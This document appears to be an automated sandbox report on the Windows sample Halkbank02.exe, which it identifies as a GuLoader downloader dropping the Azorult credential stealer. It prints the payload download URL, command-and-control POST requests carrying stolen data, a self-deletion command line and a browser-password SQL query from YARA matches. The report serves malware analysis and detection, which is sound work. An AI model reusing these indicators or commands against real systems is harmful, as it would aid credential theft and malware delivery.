Loading ...

Play interactive tourEdit tour

Windows Analysis Report Halkbank02.exe

Overview

General Information

Sample Name:Halkbank02.exe
Analysis ID:483639
MD5:a4cb6740c9195c5579acef4f7c8e40c7
SHA1:54abe0f828d828d5ff840b989fb5f010395961f6
SHA256:f1b1abf0182c865a3521d659cbc4bd86a4b00b0e4be95468a1d3b5ff46a3efc8
Tags:exegeoGuLoaderHalkbankTUR
Infos:

Most interesting Screenshot:

Detection

GuLoader Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Halkbank02.exe (PID: 5488 cmdline: 'C:\Users\user\Desktop\Halkbank02.exe' MD5: A4CB6740C9195C5579ACEF4F7C8E40C7)
    • Halkbank02.exe (PID: 5680 cmdline: 'C:\Users\user\Desktop\Halkbank02.exe' MD5: A4CB6740C9195C5579ACEF4F7C8E40C7)
      • cmd.exe (PID: 2920 cmdline: 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6500 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1l"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    0000001C.00000002.900879617.000000001F410000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
      • 0x450:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      Click to see the 2 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      28.2.Halkbank02.exe.1fcb3556.3.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x41cd65:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x41d952:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x28deb0:$string2: API call with %s database connection pointer
      • 0x28eae4:$string3: os_win.c:%d: (%lu) %s(%s) - %s
      28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x41876c:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x419359:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x2898b7:$string2: API call with %s database connection pointer
      • 0x28a4eb:$string3: os_win.c:%d: (%lu) %s(%s) - %s
      28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
      • 0x413dfc:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x4149e9:$string1: SELECT origin_url, username_value, password_value FROM logins
      • 0x284f47:$string2: API call with %s database connection pointer
      • 0x285b7b:$string3: os_win.c:%d: (%lu) %s(%s) - %s

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000001.00000002.562813823.00000000022A0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1l"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Halkbank02.exeReversingLabs: Detection: 13%
      Source: Halkbank02.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49822 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49825 version: TLS 1.2
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.28.dr
      Source: Binary string: ucrtbase.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-memory-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874674316.00000000200D4000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-synch-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.869027129.000000001F838000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000002.901129963.000000001F860000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876256297.000000001F478000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: msvcp140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-profile-l1-1-0.dll.28.dr
      Source: Binary string: ucrtbase.pdbUGP source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.870977200.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processenvironment-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.868789686.000000001F83C000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.869710011.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-1.dll.28.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-namedpipe-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876736098.000000001F4B0000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-rtlsupport-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nssdbm3.dll.28.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-string-l1-1-0.dll.28.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmp, msvcp140.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874994667.000000001F404000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.871542123.000000001EFC0000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.28.dr
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_00401500
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00401500
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_00402872
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402872
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402C7A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402E7C
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_00402A0C
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402A0C
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402C3F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_004028F7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_004028F7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_00402A81
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402A81
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_004020A7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_004020A7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402B02
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402D07
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402F0C
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_004027DC
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_004027DC
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402DF6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402B84
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 4x nop then mov ebx, ebx1_2_0040298D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_0040298D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 5x nop then xor eax, 4C849A4Bh1_2_00402F9E

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1l
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 31.210.20.16 31.210.20.16
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-c0-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: POST /panel1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.16Content-Length: 109Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 39 48 ed 3e 39 ed 3e 3c 8e 28 39 fb 28 38 8c 28 39 fb 28 39 f1 28 39 f9 4e 2f fb 3a 2f fb 39 2f fb 3e 2f fb 3c 2f fb 38 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/9H>9><(9(8(9(9(9N/:/9/>/</8
      Source: global trafficHTTP traffic detected: POST /panel1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.16Content-Length: 80859Cache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: Halkbank02.exe, 0000001C.00000002.899718241.000000001E420000.00000004.00000001.sdmpString found in binary or memory: http://31.210.20.16/panel1/index.php
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ocsp.digicert.com0N
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ocsp.thawte.com0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
      Source: mozglue.dll.28.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: http://www.mozilla.com0
      Source: Halkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drString found in binary or memory: https://www.digicert.com/CPS0
      Source: Halkbank02.exe, 0000001C.00000002.901935442.000000001FCB0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html
      Source: 204641256101765428455219.tmp.28.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownHTTP traffic detected: POST /panel1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 31.210.20.16Content-Length: 109Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 39 48 ed 3e 39 ed 3e 3c 8e 28 39 fb 28 38 8c 28 39 fb 28 39 f1 28 39 f9 4e 2f fb 3a 2f fb 39 2f fb 3e 2f fb 3c 2f fb 38 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/9H>9><(9(8(9(9(9N/:/9/>/</8
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/peql5q1scp9vbkdsqsvf2ft8b3rc16eo/1631695950000/00085571407612204224/*/1lJPD8CKPp-EVLUPAdzPmFbICPOdlXyaR?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-c0-docs.googleusercontent.comConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 172.217.168.78:443 -> 192.168.2.3:49822 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49825 version: TLS 1.2

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Malicious sample detected (through community Yara rule)Show sources
      Source: 28.2.Halkbank02.exe.1fcb3556.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
      Source: 00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
